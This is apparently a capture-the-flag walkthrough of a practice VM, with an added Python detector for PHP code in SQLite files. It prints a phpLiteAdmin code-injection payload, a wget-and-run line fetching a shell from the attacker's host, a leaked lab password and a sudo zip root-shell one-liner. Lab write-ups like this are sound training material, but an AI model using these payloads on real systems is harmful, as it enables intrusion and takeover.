We start scanning the host with nmap -A -T4 -p- 192.168.1.5 -vv

Dirb came back with these directories

We are interested in http://192.168.1.5/dbadmin, since you can log in using the default password admin


Searching searchsploit for phpLiteAdmin

The Remote PHP Code Injection works like this: create a new database with the name hack (from the left panel) and click create. Choose the database we created and, in the middle panel, create a table named hack with number of fields 1, then click go


Now name the field hack, choose type TEXT, and in the value put <?php system("uname -a"); ?>

Now go to http://192.168.1.5/view.php?page=../../usr/databases/hack to get a result from the code we’ve put
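A defensive check for the condition this step relies on, a database file that carries PHP code where an include can reach it. This is an added example, not part of the original walkthrough; the sample directory, the file names and the find_php_in_sqlite helper are constructed for illustration.

```python
import os
import sqlite3
import tempfile

SQLITE_MAGIC = b"SQLite format 3\x00"   # 16-byte header of every SQLite 3 file
PHP_TAG = b"<?php"

def find_php_in_sqlite(root):
    """Return sorted paths under root that are SQLite files containing a PHP open tag."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    # Identify by content, not extension: the database name is user-chosen.
                    if fh.read(len(SQLITE_MAGIC)) != SQLITE_MAGIC:
                        continue
                    body = fh.read().lower()
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            # SQLite stores TEXT values uncompressed, so the tag is visible in raw bytes.
            if PHP_TAG in body:
                hits.append(path)
    return sorted(hits)

def build_sample_dir():
    """Constructed sample: one clean database and one holding a harmless PHP tag."""
    root = tempfile.mkdtemp(prefix="dbscan_")
    for name, value in (("clean", "hello"), ("tainted", "<?php echo 1; ?>")):
        con = sqlite3.connect(os.path.join(root, name))
        con.execute("CREATE TABLE t (f TEXT)")
        con.execute("INSERT INTO t VALUES (?)", (value,))
        con.commit()
        con.close()
    return root

if __name__ == "__main__":
    for path in find_php_in_sqlite(build_sample_dir()):
        print("PHP tag inside SQLite file:", path)
```

On a real host, point find_php_in_sqlite at the directory where the admin tool writes its databases and alert on any hit.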

We can modify the script and use Metasploit to get a shell

Open a listening port and open a connection to your machine using:
python -m SimpleHTTPServer 80
Now modify the script to be '<?php system("cd /tmp; wget http://192.168.1.11/shell; chmod +x shell; ./shell"); ?>'

Changing directories to /home/zico/wordpress and viewing config.php, we found a username and password and used them to log in over ssh: user zico, pass sWfCsfJSPV9H3AmQzw8


Running this command gives us a root shell. First go to the tmp folder and create any file with the touch command, then:
sudo zip newfile.zip newfile -T --unzip-command="sh -c /bin/bash"
